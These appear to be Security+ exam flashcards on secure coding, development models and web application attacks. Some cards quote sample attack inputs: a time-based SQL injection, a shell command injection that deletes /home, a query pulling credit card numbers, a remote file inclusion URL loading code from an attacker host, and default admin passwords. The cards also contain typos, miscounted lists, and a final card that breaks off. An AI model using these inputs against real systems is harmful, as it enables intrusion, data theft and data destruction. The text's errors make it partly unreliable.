CompTIA Security+ SYO 601 Chapter 6 Secure Coding
Sever-side request forgery (SSRF) attacks exploit a similar vulnerability to XSRF attacks but instead of tricking a user's browser into visiting a URL, they trick a sever into visiting?
A URL based on user-supplied input. SSRF attacks are possible when a web application accepts URLs from a user as input and then retrieves information from that URL. If the server has access to nonpublic URLs, an SSRF attack can unintentionally disclose that information to an attacker.
The SDLC is useful for organizations and for developers because it provides?
A consistent framework to structure workflow and to provide planning for the development process. Despite these advantages, simply picking an SDLC model to implement may not always be the best choice. Each SDLC model has certain types of work and projects that it fits better than others, making choosing an SDLC model that fits the work an important part of the process.
Credential-stealing attacks allow a hacker or penetration tester to authenticate directly to a service using?
A stolen account.
The time-of-check-to-time-of-use (TOCTTOU or TOC/TOU) issue is a race condition that occurs when a program checks?
Access permissions too far in advance of a resource request. For example, if an operating system builds a comprehensive lists of access permissions for a user upon logon and then consults that list throughout the logon session, a TOCTTOU vulnerability exist. If the system administrator revokes a particular permission, that restriction would not be applied to the user until the next time they logon. If the user is logged on when the access revocation takes place, they will have access to the resource indefinitely. The user simply needs to leave the session open for days, and then the new restrictions will never be applied. To prevent this race condition, the developer should evaluate access permissions at the time of each request rather than catching a listing of permissions.
Penetration testers may assume that an administrator may not have changed the default password and try and use a variety of default passwords on applications and devices in an attempt to gain access. Some of the common username/password combinations to test are?
Administrator/password Admin/password Admin/admin
Reviewing the code that is written for an application provides a number of?
Advantages. It helps to share knowledge of the code, and the experience gained in writing is better than simple documentation alone would be since it provides a personal understanding of the code and its functions. It also helps detect problems while enforcing coding best practices and standards by exposing the code to reviews during its development cycle. Finally, it ensures that multiple members of a team are aware of what the code is supposed to do and how it accomplishes its task.
With code security software developers should?
Also take steps to safeguard the creation, storage and delivery of their code. They do this through a variety of different techniques.
In addition to using the content returned by an application to assess susceptibility to blind SQL injection attacks penetration testers may use the?
Amount of time required to process a query as a channel for retrieving information from a database. These attacks depend on delay mechanisms provided by different database platforms. For example, Microsoft SQL Server's Transact-SQL allows a user to specify a command that might look something like this: WAITFOR DELAY '00:00:15' This command would instruct the database to wait 15 seconds before performing the next action. An attacker seeking to verify whether an application is vulnerable to time-based attacks might provide the following input to the account ID field which might look something like this: o 52019' ; WAITFOR DELAY '00:00:15' ; --
Cross-site scripting (XSS) attacks occur when web applications allow?
An attacker to perform HTML injection, inserting their own HTML code into a web page.
Session hijacking attacks take a different approach by stealing?
An existing authenticated session. These attacks don't require that that the attacker gain access to the authentication mechanism; instead, they take over an already authenticated session with a website.
·WAFs function similarly to network firewalls, but they work at the?
Application layer. A WAF sits in front of a web server, and receives all network traffic headed to that server. In then scrutinizes the input headed to the application, performing input validation (whitelisting and/or blacklisting) before passing the input to the web server. This prevents malicious traffic from ever reaching the web server and acts as an important component of layered defense against web application vulnerabilities.
Web applications are complex ecosystems consisting of application code, web platforms, operating systems, databases, and interconnected?
Application programming interfaces (APIs). The complexity of these environments makes many different types of attacks passible and provides fertile ground for penetration testers. We've already looked at a variety of attacks, against web applications, including injection attacks, session hijacking, directory transversal, and more. In the following sections, we round out our look at web-based exploits by exploring cross-site scripting, cross site request forgery and clickjacking.
Known how to implement application security controls?
Application security should be at the forefront of security operations principles. This includes protecting code through the use of input validation. Web applications that rely on cookies for session management should secure those cookies through the use of transport encryption. Code should be routinely subjected to code review as well as static and dynamic testing.
Applications that allow user input should perform?
Application validation of user input to reduce the likelihood that it contains an attack. Improper input handling practices can expose applications to injection attacks, cross-site scripting attacks, and other exploits.
Cybersecurity professionals and application developers have serval tools at their disposal to help protect against?
Application vulnerabilities. The most important of these is input validation.
A multitude of development styles, languages, frameworks, and other variables may be involved in the creation of an?
Application, but many of the security issues are the same regardless of which you use. In fact, despite many development frameworks and languages providing security features, the same security problems continue to appear in applications all the time! Fortunately, a number of common best practices are available that you can use to help ensure software security for your organization.
Attackers use a technique called blind SQL injection to conduct an?
Attack even when they don't have the ability to view the results directly.
APIs that are not intended for public use should always be secured with an?
Authentication mechanism such as an API key, and accessed only over encrypted channels that protect those credentials from eavesdropping attacks.
API security relies on?
Authentication, authorization, proper data scoping to ensure that too much data isn't released, rate limiting, input filtering, and appropriate monitoring and logging to remain secure. Of course, securing the underlying systems, configuring the API endpoint sever or service, and providing normal network layer security to protect the service is also important. Many security tools and severs provide APIs, and security professionals are often asked to write scripts or programs that can access an API to pull data.
Since continuous integration relies on an automated build process, it also requires?
Automated testing. It is often paired with continuous deployment (CD) (sometimes called continuous delivery), which rolls out tested changes into production automatically as soon as they have been tested.
Security professionals seek to avoid single point of failure in their environments to avoid?
Availability risks if an issue arise with a single component. This is also true for software development. Security professionals should watch for places in their organization that are dependent on a single piece of source code, binary executable files, or compliers. Though it may not be possible to eliminate all of these dependencies, tracking them is a critical part of maintaining a secure codebase.
There are also a number of common code review processes, including?
Both formal and Agile processes like pair programming, over-the-shoulder, and Fagan code reviews.
Injection vulnerabilities are among the primary mechanisms that attackers use to?
Break through a web application and gain access to the systems supporting that application. These vulnerabilities allow an attacker to supply some type of code to the web application as input and trick the web server into either executing that code or supplying it to another server to execute.
The source code, that is the basis of every application and program can contain a variety of?
Bugs and flaws, from programming and syntax errors to problems with business logic, error handling, and integration with other services and systems. It is important to be able to analyze the code and understand what the code does, how it performs that task, and where flaws may occur in the program itself. This is often done via static or dynamic code analysis along with testing methods like fuzzing. Once changes are made to code and it is deployed, it must be regression tested to ensure that the fixes put in place did not create new security issues!
Secure applications depend on secure databases to provide the content and transaction processing necessary to support?
Business operations. Relational databases form the core of most modern applications, and securing these databases goes beyond just protecting them against SQL injection attacks. Cybersecurity professionals should have a strong understanding of secure database administration practices.
Buffer overflow attacks are quite commonplace and tend to persist for many years after they are initially discovered. For example, the 2016 Verizon Data Breach Investigation reports identify 10 vulnerabilities that were responsible for 85% of the compromises in their study. Among the top 10 were four overflow issues what were they?
CVE 1999-1058: Buffer overflow in Vermillion FTP Dameon. CVE 2001-0876: Buffer overflow in Universal Plug and Play (UPnP) on Windows 98 98SE, ME, and XP. CVE 2002-0126: Buffer overflow in Black Moon FTP Sever 1.0 through 1.5. CVE 2003-0818: Multiple integer overflows in Microsoft's ASN.1 library. The four-digit number following the letters CVE in each vulnerability title indicates the year that the vulnerability was discovered. In a study of breaches that took place in 2015, four of the top 10 issues causing breaches were exploits of overflow vulnerabilities that were between 12 and 16 years old. Verizon hasn't included this type of analysis in their more recent reports, but there's no reason to believe that this trend has changed.
In most pair programming environments, the developers are expected to?
Change roles frequently, allowing both of them to spend time thinking about the code while at the keyboard and to think about the design and nay issues while reviewing it.
Application programming interfaces (APIs) are interfaces between?
Clients and servers or applications and operating systems that define how the client should ask for information from the sever and how the server will respond. This definition means that programs written in any language can implement the API and make requests.
SQL injection attacks are a specific example of a general class of attacks known as?
Code injection attacks. These attacks seek to insert attacker-written code into the legitimate code created by a web application developer. Any environment that inserts user-supplied input into code written by an application developer may be vulnerable to a code injection attack. Similar attack takes place against other environments. For example, attackers might embed commands in text being sent as part of a Lightweight Directory Access Protocol (LDAP) query, conducting an LDAP injection attack. They might also attempt to embed code in Extensible Markup Language (XML) documents, conducting an XML injection attack. Commands may even attempt to load dynamically linked libraries (DLLs) containing malicious code in a DLL injection attack. In addition to SQL injection, cross-site scripting is an example of a code injection attack that inserts HTML code written by an attacker into the web pages created by a developer.
Code repositories are an important part of application security but are only one aspect of?
Code management. Cybersecurity teams should also work hand in hand with developers and operations teams to ensure that applications are provisioned and deprovisioned in a secure manner through the organization's approved release management process. This process should include code integrity measurement. Code integrity measurement uses cryptographic hash functions to verify that the code being released into production matches the code that was previously approved. Any deviation in hash values indicates that code was modified either intentionally or unintentionally, and requires further investigation prior to release.
Explain secure code deployment and automation concepts?
Code repositories serve as version control mechanisms and a centralized authority for the secure provisioning and deprovisioning of code. Developers and operations teams should work together on developing automated courses of action as they implement a DevOps approach to creating and deploying software. Software applications should be designed to support both scalability and elasticity.
Code signing provides developers with a way to confirm the authenticity of their?
Code to end users. Developers use a cryptographic function to digitally sign their code with their own private key and then browsers can use the developer's public key to verify that signature and ensure that the code is legitimate and was not modified by unauthorized individuals. In cases where there is a lack of code signing, users may inadvertently run inauthentic code.
Dynamic code analysis relies on execution of the?
Code while providing it with input to test the software. Much like static code analysis, dynamic code analysis may be done via automated tools or manually, but there is a strong preference for automated testing due to the volume of test that need to be conducted in most dynamic code testing processes.
Attackers thrive on exploiting errors in?
Code.
No matter how well talented the development team for an application is, there will be some form of flaws in?
Code. Veracode's 2019 metrics for applications based on their testing should that 83 percent of the applications they scanned exhibited at least one security issue during the testing process. That number points to a massive need for software security testing to continue to be better integrated into the development life cycle.
In some cases, application code may reach back to the operating system to execute a?
Command. This is epically dangerous because an attacker might exploit a flaw in the application and gain the ability to directly manipulate the operating system. An example is an application that sets up a new student account for a course. Among other actions, it creates a directory on the sever for the student. On a Linux system, the application might use a system () call to send the directory creation command to the underlying operating system for example if someone fills in the text box with: § Mchapple The application might use a function call System('mkdir/home/students/mchapple') To create a home directory for that user. An attacker examining this application might guess that this is how the application works and then supply this input: Mchapple & rm -rm /home Which the application then uses to create the system call: System('mkdir /home/students/mchapple &rm -rf home;) This sequence of commands deletes the /home directory along with all fields and subfolders it contains. The ampersand in this command indicates that the operating system should execute the text after the ampersand as a separate command. This allows the attacker to execute the rm command by exploiting an input field that is only intended to execute a mkdir command.
There are many ways that an attacker may learn a user's password, ranging from technical to social Here are just a few of the possible ways that an attacker might discover a user's password what are those ways?
Conducting social engineering attacks that trick the user into revealing a password, either directly or through a false authentication mechanism. Eavesdropping on unencrypted network traffic. Obtaining a dump of passwords from previously compromised sites and assuming that a significant proportion of users reuse their passwords from that site on other sites. In addition to these approaches, attackers may be able to conduct credential brute-forcing attacks, in which they obtain a set of weakly hashed passwords from a target system and then conduct an exhaustive search to crack those passwords and obtain access to the system. In some cases, application developers, vendors, and system administrators make is easy for an attacker. Systems often ship with the default administrative accounts that may remain unchanged. For example, a section of manual for a Zyxel router that includes a default username and password as well as instructions for changing that password.
DevOps and DevSecOps are often combined with?
Continuous integration and continuous deployment methodologies, where they can rely on automated security testing, and integrated security tooling, including scanning, updates, and configuration management tools, to help ensure security.
Using continuous integration and continuous deployment methods requires building?
Continuous validation and automated security testing into the pipeline testing process. It can result in new vulnerabilities being deployed into production and could allow an untrusted or rouge developer to insert flaws into code that is deployed and then remove the code as part of a deployment in the next cycle. This means that logging, reporting, and continuous monitoring must all be designed to fit the CI/CD process.
Most websites that require authentication manage user sessions using?
Cookies managed in the user's browser a transmitted as part of the HTTP header information provided by a website. In an example, the user accesses the website's login form and uses their credentials to authenticate. If the user passes the authentication process, the website provides the user's browser with a cookie that may be used to authenticate future requests. Once the suer has a valid cookie stored in the browser, the browser transmits that cookie will all future requests made to the website. The website inspects the cookie and determines that the user has already authenticated and does not need to reenter their password or complete other authentication tasks.
Pair programming adds additional?
Cost to development since it requires two full-time developers. At the same time, it provides additional opportunities for review and analysis of the code and directly applies more experience to coding problems, potentially increasing the quality of the code.
Organizations often want other developers to build upon platforms that they have?
Created. For example, Twitter and Facebook might want to allow third-party application developers to create apps that post content to the user's social media feeds. To enable this type of innovation, services often create-application programming interfaces (APIs) that enable automated access.
Request forgery attacks come in two forms what are they?
Cross-site request forgery. Sever-side request forgery.
Maintaining sensitive personal information in databases exposes an organization to risk in the event that information is stolen by an attacker. Database administrators should take measures to protect against data exposure. What are some of the measures that they should take?
Data minimization It is the best defense. Organizations should not collect sensitive information that they don't need and should dispose of any sensitive information that they do collect as soon as it is no longer needed for a legitimate business purpose, Data minimization reduces risk because you can't lose control of information that you don't have in the first place! Tokenization It replaces personal identifiers that might directly reveal an individual's identity with a unique identifier using a lookup table. For example, we might replace a widely known value such as student ID, with a randomly generate 10-digit number. We'd then maintain a lookup table that allows us to convert those back to student IDs if we need to determine someone's identity. Of course, if you use this approach, you need to keep the lookup table secure. Hashing Uses a cryptographic hash function to replace sensitive identifiers with an irreversible alternative identifier. Salting these values with a random number prior to hashing them makes these hashed values resistant to a type of attack known as a rainbow table attack.
In some cases, web developers begin an application to directly retrieve information from a?
Database based on an argument provided by the user in either a query string or a POST request. For example, this string might be used to retrieve a document from a document management system: http://www.mycompany.com/getDocument.php?documentID=1842 There is nothing wrong with this approach, as long as the application also implements other authorization mechanisms.
Web applications often receive input from users and use it to compose a?
Database query that provides results that are sent back to a user. For example, consider the search function on a e-commerce site. If a user enters orange tiger pillow into the search box, the web server needs to know what products in the catalog might match the search term. It might send a request that looks something like this: SELECT ItemName, ItemDescription, ItemPrice FROM Products WHERE ItemName LIKE '%orange%' AND ItemName LIKE '%tiger%' AND ItemName LIKE '%pillow%' The command above retrieves a list of items that can be included in the results returned to the end user.
Known how to implement database security controls?
Databases often store an organization's most sensitive information, and database security controls should be put in place that protect that information adequately. This begins with the use of normalized database designs and continues the use of stored procedures to interact with databases. Sensitive information stored in databases should be protected through the use of data minimization, data tokenization, and a combination of salting and hashing.
Code repositories also help avoid the problem of?
Dead code where code is in use in an organization but nobody is responsible for the maintenance of that code and, in fact, nobody may even know where the original source file resides.
Passwords are the most common form of authentication in use today, but unfortunately, they are also the most easily?
Defeated. The reason for that is that passwords are a knowledge-based authentication technique. An attacker who learns a user's password may then impersonate the user from that point forward until the password expires or is changed.
OWSAP provides a regularly updated list of proactive controls that is useful to review not only as a set of useful best practices, but also as a way to see how web application security threats change from year to year. Here is OWSAP's top proactive controls form 2018 with brief descriptions which are?
Define Security Requirements Implement security throughout the development process. Leverage Security Frameworks and Libraries Preexistign security capabilities can make security applications easier. Secure Database Access Prebuild SQL queries to prevent injection and configure databases for secure access. Encode and Escape Data Remove special characters. Validate all Inputs Treat user input as untrusted and filter appropriately. Implement Digital Identity Use multifactor authentication, secure password storage and recovery, and session handling. Enforce Access Controls Require all requests to go through access control checks, deny by default, and apply the principle of least privilege. Protect Data Everywhere Use encryption in transit and at rest. Implement Security Logging and Monitoring This helps detect problems and allows investigation after the fact. Handle all Errors and Exceptions Errors should not provide sensitive data, and applications should be tested to ensure that they handle problems gracefully.
The SDLC can be approached in many ways, and overtime a number of formal models have been created to help provide a common framework for development. Formal SDLC models can be very?
Detailed, with specific practices, procedures, and documentation, but many organizations choose the elements of one or more models that best fit their organizational style, workflow, and requirements.
The term DevSecOps describes security as part of the?
DevOps model. In this model, security is shared responsibility that is part of the entire development and operations cycle. That means integrating security into the design, development, testing, and operational work done to produce applications and services.
Pair programming is an Agile software?
Development technique that places two developers at one workstation. One developer writes code, while the other developer reviews their code as the write it. This is intended to provide real-time code review, and it ensures that multiple developers are familiar with the code that is written.
Pointers are a commonly used concept in application?
Development. They are simply an area of memory that stores an address of another location in memory. For example, we might have a pointer called photo that contains the address of location in memory where a photo is stored.
In Linux operating systems the .. operator in a file path refers to the directory one level higher than the current?
Directory. For example, the path /var/www/html/../ refers to the directory that is one level higher than the html directory, or var/www/. Directory traversal attackers use this knowledge and attempt to navigate up through the directory hierarchy. If you use the /var/www/html directory as you starting point, the first.. operator brings you to /var/www, the second brings you to /var, and the third brings you to the root directory, /. The remainder of the URL brings you down into the /etc/ directory and to the location of /etc/shadow file.
One way that attackers may use a fake driver is by refactoring an existing?
Driver. If they have access to the driver's source code, they can modify it to also include malware elements. This is very difficult to pull off in practice, however, because it's not easy to get access to the source code for drivers.
Cookies work the same way. There just digital versions of badges. If an attacker is able to steal someone's cookie, they may then impersonate that user to the website that issued the cookie. There are several ways that an attacker might obtain a cookie what are those seven ways?
Eavesdropping on unencrypted network connections and stealing a copy of the cookie as it is transmitted between the user and the website. Installing malware on the user's browser that retrieves cookies and transmits them back to the attacker. Engaging in a man-in-the-middle attack, where the attacker fools the user into thinking that the attacker is actually the target website and presenting a fake authentication form. They may then authenticate to the website on the user's behalf and obtain the cookie.
The Agile methodology is based on 12 principals what are they?
Ensure customer satisfaction via early and continuous delivery of the software. Welcome changing requirements, even late in the development process. Deliver working software frequently (in weeks rather than months). Ensure daily cooperation between developers and business people. Projects should be built around motivated individuals who get the support, trust, and environment they need to succeed. Face-to-Face conversations are the most efficient way to convey information inside the development team. Progress is measured by having working software. Development should be done at a sustainable pace that can be maintained on an ongoing basis. Pay continuous attention to technical excellence and good design. Simplicity—the art of maximizing the amount of work no done—is essential. The best architectures, requirements, and designs emerge from self-organizing teams. Teams should reflect on how to become more effective and then implement that behavior at regular intervals. These principles drive an SDLC process that is less formally structed then Spiral or Waterfall but that has many opportunities for customer feedback and revision. It can react more nimbly to problems and will typically allow faster customer feedback—an advantage when security issues are discovered.
Organizations may also introduce third party-code into their?
Environments when they outsource code development to other organizations. Security teams should ensure that outsourced code is subjected to the same level of testing as internally developed code.
Insecure URL redirects are another vulnerability that attackers may?
Exploit in an attempt to steal user sessions. Some web applications allow the browser to pass destination URL's to the application and then redirect the user to that URL at the completion of their transaction. For example an ordering page might user URls with this structure: https://www.mycompany.com/ordering.php?redirect=http%3a//www.mycompany.com/thankyou.htm
When attacker discover a file inclusion vulnerability, they often?
Exploit it to upload a web shell on the server. Web shells allow the attacker to execute commands on the server and view the results in the browser. This approach provides the attacker with access to the server over commonly used HTTP and HTTPS ports, making their traffic less vulnerable by detection security tools. In addition, the attacker may even repair the initial vulnerability they used to gain access to the server to prevent its discovery by another attacker seeking to take control of the server or by a security team who then might be tipped off to the successful attack.
In some cases, developers may include usernames and passwords in their source code. There are two variations on this error what are they?
First, the developer may create a hard-coded maintenance account for that application that allows the developer to regain access even if the authentication system fails. This is known as a backdoor vulnerability and is problematic because it allows anyone who knows the backdoor password to bypass normal authentication and gain access to the system If the backdoor becomes publicly (or privately!) known, all copies of the code in production are compromised. The second variation of hard-coding credentials occurs when developers include access credentials for other services within their source code. If that code is en outsiders. This occurs quite often when developers accidently publish code to a public code repository, such as GitHub, that contains API keys or other hard-coded credentials.
The Spiral model also provides greater?
Flexibility to handle changes in requirements as well as external influences such as availability of customer feedback and development staff. It also allows the software development life cycle to start earlier in the process than Waterfall does. Because Spiral revisits its process, it is possible for this model to result in rework or to identify design requirements later in the process that require a significant design change due to more detailed requirements coming to light.
Software development does not always follow a?
Formal model, but most enterprise development for major applications does follow most, if not all, of these phases. In some cases, developers may even use elements of an SDLC model without realizing it!
Attackers often seek to undermine the security of those authentication systems, because, if they are able to do so, they might?
Gain illegitimate access to systems, services and information protected by that authentication infrastructure.
Device drivers play an important role in computing. They serve as the software interface between?
Hardware devices and the operating system. Device's drivers are the reason that you can use almost any printer from a wide variety of manufactures with Windows and any other operating system. Microsoft does not need to design Windows to work with every printer on the market. Instead, they provide manufactures with the ability to write Windows drivers for the product. When a manufacture builds and new printer, they design a driver that provides Windows with instructions on how to interact with the printer.
An attacker seeking to conduct a cross-site scripting attack could try to insert
Html script in code. When future users load this message or code, they would then see the alert pop-up. This is fairly innocuous, but an XSS attack could also be used to redirect users to a phishing site, request sensitive information, or perform another attack.
Agile is rooted in the Manifesto for Agile Software Development, a document that has four basic premises. What are these four premises?
Individuals and interaction are more important than processes and tools Working software is preferable to comprehensive documentation. Customer collaboration replaces contract negotiation Responding to change is key, rather than following a plan
Input validation techniques are the go-to standard for protecting against?
Injection attacks. However, it's important to understand that attackers have historically discovered ways to bypass almost every form of security control. Parameter pollution is one technique that attackers have successfully used to defeat input validation controls.
Parametrized queries offer another technique to protect applications against?
Injection attacks. In a parametrized query, the client does not directly send SQL code to the database server. Instead, the client sends arguments to the server, which then inserts those arguments into a precompiled query template. This approach protects against injection attacks and also improves database performance. Stored procedures are an example of an implementation of parametrized queries used by some database platforms.
In the basic SQL injection attack the attacker is able to provide?
Input to the web application and then monitor the output of that application to see the result. Though that is the idea situation for an attacker, many web applications with SQL injection flaws do not provide the attacker with a means to directly view the results of the attack. However, that does not mean that the attack is impossible; it simply makes it more difficult.
The most effective form of input validation uses?
Input whitelisting, in which the developer describes the exact type of input that is expected from the user and then verifies that the input matches that specification before passing the input to other processes or servers. For example, if an input form prompts a user to enter their age, input whitelisting could verify that the user supplied an integer value within the range 0-120. The application would then reject any values outside that range.
Cross-site scripting attacks often exploit reflected?
Input, this is not the only way that the attacks might take place. Another common technique is to store cross-site scripting code on a remote web server in an approach known as stored XSS> these attacks are described as persistent, because they remain on the server even when the attacker is not actively waging an attack.
Fuzz testing, or fuzzing involves sending?
Invalid or random data to an application to test its ability to handle unexpected data. The application is monitored to determine if it crashes, fails, or responds in an incorrect manner.
Memory pointers can also cause security?
Issues.
DevOps combines software development and?
It operations, with the goal of optimizing the SDLC. This is done by using collections of tools called toolchains to improve coding, building, and test, packing, release, configuration, and configuration management, and monitoring elements of a software development lifecycle.
DevOps should have what?
It should have security baked into it as well.
Fuzzing is typically automated due to the?
Large amount of data that a fuzz test involves, and it is particularly useful for detecting input validation and logic issues as well as memory leaks and error handling. Unfortunately, fuzzing tends to only identify simple problems—it does not account for complex logic or business process issues, and it may not provide compete code coverage if its progress is not monitored.
File inclusion attacks take directory traversal to the next?
Level. Instead of simply retrieving a file form the local operating system and displaying it to the attacker, file inclusion attacks actually execute the code contained within a file, allowing the attacker to fool the web server into executing arbitrary code.
File inclusion attacks come in two variants what are they?
Local file inclusion attacks seek to execute code stored in a file location elsewhere on the web server. They work in a manner very similar to a directory traversal attack. For example, an attacker might use the following URL to execute a file named attack.exe that is stored in the C:\www\uploads directory on a Windows server: http://www.mycompany.com/app.php?include=C:\\www\\uploads\\attack.exe Remote file inclusion attacks allow the attacker to go a step further and execute code that is stored on a remote server. These attacks are especially dangerous because the attacker can directly control the code from being executed without having to first store a file on the local server. For example, an attacker might use this URL to execute file stored on a remote server: http://muycompany.com/app.php?include=http://evil.atttacker.com/attack.exe
XSRF attacks work by making the reasonable assumption that users are often?
Logged into many different websites at the same time. Attacker than embed code in one website that sends a command to a second website. When the user clicks the link of the first site, they are unknowingly sending a command to the second site. If the user happens to be logged into that second site, the command may succeed. Consider for example, an online banking site. An attacker who wants to steal funds from user accounts might go to an online forum and post a message containing a link. That link directly goes to the money transfer site that issues a command to transfer funds to the attacker's account. The attacker than leaves the link posted on the forum and waits for an unsuspecting user to come along and click the link. If the user happens to be logged into the banking site the transfer succeeds.
Once an attacker has a cookie, they may try to perform a cookie?
Manipulation to alter the details sent back to the website or simply use the cookie as the badge required to gain access to the site. This is known as a session replay attack.
Pass-around code review, sometimes known as email pass-around code review, it a form of?
Manual peer review done by sending completed code to reviewers who check the code for issues.
Waterfall has been replaced in?
Many organizations because is seen as relatively inflexible, but it remains in use for complex systems. Since Waterfall is not highly responsive to changes and does not account for internal iterative work, it is typically recommended for development efforts that involve a fixed scope and a known timeframe for delivery and that are using a stable, well-understood technology platform.
If an application requests memory from the operating system, it eventually no longer needs that?
Memory and should then return the memory to the operating system for other uses. Memory that is no longer needs, perhaps by simply losing track of an object that it has written to a reserved area of memory. If the application continues to do this over a long period of time, it can slowly consume all the memory available to the system, causing it to crash. Rebooting that system often resets the problem, returning the memory to other uses but if the memory leak isn't correct the cycle simply begins anew.
Applications are often responsible for managing their own use of?
Memory, and in those cases, poor memory management practices can undermine the security of the entire system.
The software development life cycle (SDLC) describes the steps in a?
Model for software development throughout its life. It maps software creation from an idea to requirements gathering and analysis to design, coding, testing, and rollout. Once software is in production, it includes user training, maintenance, and decommissioning at the end of the software package's useful life.
It is often difficult to perform input whitelisting because of the?
Nature of many fields that allow user input. For example, imagine a classified ad application that allows users to input the description of a product that they wish to list for sale. It would be difficult to write logical rules that describe all valid submissions to that field that would prevent the insertion of malicious code. In this case, developers might user input blacklisting to control user input. With this approach, developers do not try to explicitly describe acceptable input but instead describe potentially malicious input that must be blocked. For example, developers might restrict the use of HTML tags or SQL commands in user input.
The Waterfall methodology is a sequential model in which each phase is followed by the?
Next phase. Phases do not overlap, and each logically leads to the next.
If an application tires to de-reference the null pointer, it causes a condition known as a?
Null pointer exception. In the best case a null pointer exception causes the program to crash, providing an attacker with access to debugging information that may be used for reconnaissance of the applications' security. In the worst case, a null pointer exception may allow an attacker to bypass security controls. Security professionals should work with application developers to help them avoid these issues.
One of the best resources for secure coding practices is the?
Open Web Application Security Project (OWSAP). OWSAP is the home of a broad community of developers and security practitioners, and it host many community-developed standards, guides, and best practice documents, as well as a multitude of open-source tools.
Device drivers require low-level access to the?
Operating system and run with admin privileges. If an attacker can convince a user to install a malicious driver on their computer, that malware can gain complete control of the system.
The NTLM pass-the-hash attack is another form of a replay attack that takes place against the?
Operating system rather than a web application. The attacker begins by gaining access to a Windows system and then harvests stored NTLM password hashes from that system. They can then attempt to use these hashes to gain user or administrator access to that system or other systems in the same Active Directory domain.
Participating in the SDLC das a security professional provides significant?
Opportunities to improve the security of applications. The first change to help with software security is in the requirements of gathering and design phases, when security can be built in as part of the requirements and then designed in based on those requirements. Later, during the development process, secure coding techniques, code review, and testing can improve the quality and security of the code that is developed. During the testing phase, fully integrated software can be tested using tools like web application security scanners, or penetration testing techniques. This also provides the foundation for ongoing security operations by building the baseline for future security scans and regression testing during patching and updates. Throughout these steps, it helps to understand the common security issues that developers face, create, and discover.
· In a SQL injection attack, the attacker might send a very unusual-looking request to the web server, perhaps searching for looks something like this which is?
Orange tiger pillow' ; SELECT CustomerName, CreditCardNumber FROM Orders; --
Software ranging from customer-facing applications and services to smaller programs, down to the smallest customer scripts written to support business needs, is everywhere in our?
Organizations
Security professionals should be familiar with the various ways that third-party code is used in their?
Organizations as well as the ways that their organization makes services available to others. It's fairly common for security flaws to arise in shared code, making it extremely important to know these dependencies and remain vigilant about security updates.
Over-the-shoulder code review also resiles on a?
Pair of developers, but rather than requiring constant interaction and hand-offs, over-the-shoulder requires the developer who wrote the code to explain the code to the other developer. This approach allows peer review of the code and can also assist developers in understanding how the code works, without the relatively high cost of pair programming.
Cybersecurity analysts discovering a buffer overflow vulnerability during a vulnerability scan should seek out a?
Patch that corrects the issue. In most cases, the scan report will directly identify an available patch.
The Spiral method uses four phases, which repeatedly visits throughout the development life cycle which are?
Phase 1 Identification, or requirements gathering, which initially gathers business requirements, system requirements, and more detailed requirements for subsystems or modules as the process continues . Phase 2 Design, conceptual, architectural, logical, and sometimes physical or final design. Phase 3 Build, which procedures an initial proof of concept and then further develop releases until the final production build is produced. Phase 4 Evaluation, which involves risk analysis for the development project intended to monitor the feasibility of delivering the software for a technical and managerial viewpoint. As the development cycle continues, this phase also involves customer testing and feedback to ensure customer acceptance
A typical six phase Waterfall process includes six phases which are?
Phase 1 In this phase requirements are gathered and documented. Phase 2 This phase involves analysis intended to build business rules and models. Phase 3 In this phase a software architecture is designed . Phase 4 In this phase coding and integration testing of the software occurs. Phase 5 Once the software is complete this phase occurs, with testing and debugging being completed in this phase Phase 6 The software enters an operational phase, with support, maintenance, and other operational activities happening on an ongoing basis.
If you are used to Waterfall or Spiral development process, Agile is a significant departure from?
Planning, design, and documentation-centric approaches that Agile predecessors use. Agile methods tend to break up work into smaller units, allowing work to be done more quickly and with less up-front planning. It focuses on adapting to needs rather than predicting them, with major milestones identified early in the process but subject to change as the project continues to develop.
The Fagan inspection process shows the six phases of typical process what are those six phases.
Planning, including preparation of materials, attendees, and location Overview, which prepares the team by reviewing the materials and assigning roles such as coder, reviewer, and moderator Preparation, which involves, reviewing the code or other item being inspected and documents any issues or questions they may have. Meeting to identify defects based on the notes from the preparation phase. Follow-up by the moderator to ensure that all issues identified have been found and that no new defects were created during the resolution process.
When an application needs to access the actual photo, it performs an operation called pointer de-referencing. This is simply called?
Pointer de-referencing. This simply means that the application follows the pointer and accesses the memory referenced by the pointer address. There's nothing unusual with this process. Applications do it all the time.
Continuous integration (CI) is a development?
Practice that checks code into a shared repository on a consistent ongoing basis. In CI environments, this can range from a few times a day to a very frequent process of check-ins and automated builds. The main goal of the approach is to enable the use of automation and scripting to implement automated courses of action that result in continuous delivery of code.
There's an active and healthy debate in the database community about how closely database designers should follow the normal forms. Some of the advantages of implementing these principals as much as practical include that normalized designs do these following things which are?
Prevent data inconsistency Prevent update anomalies Reduce the need for restricting existing databases, and Make the database schema more informative.
Database normalization is a set of design?
Principles that database designers should follow when building and modifying databases. Databases that follow these principles are said to be in normal forms, which are numbered increasing order of the level of principle followed. The simplest normal formal is the first normal form (1NF) and more advanced normal form follow sequentially (2NF, 3NF and so on)
Agile software development is an iterative and incremental?
Process, rather than the linear process that Waterfall and Spiral use.
Unlike many other methods, static analysis does not run the?
Program, instead it focuses on understanding how the program is written and what the code is intended to do. Static code analysis can be conducted using automated tools or manually by reviewing the code—a process sometimes called "code understanding" Automated static code analysis can be very effective at finding known issues, and manual static code analysis helps to identify programmer-induced errors.
An application is still responsible for ensuring that the user is?
Properly authenticated and is authorized to access the request document. The reason for this is that an attacker can easily view this URL and then modify it to attempt to retrieve other documents, such as in these examples: https://mycompany.com/getDocument.php?docmentID=1841 https://mycompany.com/getDocument.php?docmentID=1843 https://mycompany.com/getDocument.php?docmentID=1843 If the application does not perform authorization checks, the user may be permitted to view information that exceeds their authority. This situation is known as an insecure direct object reference.
XSS attacks occur when an application allows?
Reflected Input o When the web application "reflects" this input in the form of a web page, your browser processes it as it would any other web page: it displays the text portions of the web page and executes the script portions. In this case, the script simply opens a pop-up window that says "hello" in it. However, you could be more malicious and include a more sophisticated script that asks the user to provide a password and then transmit it to a malicious third party. At this pint you're probably asking yourself how anyone would fall victim to this type of attack. After all, you're not going to attack yourself by embedding scripts in the input that you provide to a web application that preforms reflection. The key to this attack is that its possible to embed form input in a link.
Developers must understand and write their code so that it is?
Resilient to unexpected situations that an attacker might create in order to test the boundaries of code. For example, if a web form requests an age as input, it's insufficient to simply verify that the age is an integer. Attackers might enter a 50,000 digit integer in that field in an attempt to perform an integer overflow attack.
Memory leaks are one example of?
Resource exhaustion.
One of the issues that a cybersecurity professional needs to watch for with memory or any other limited resource on a system is?
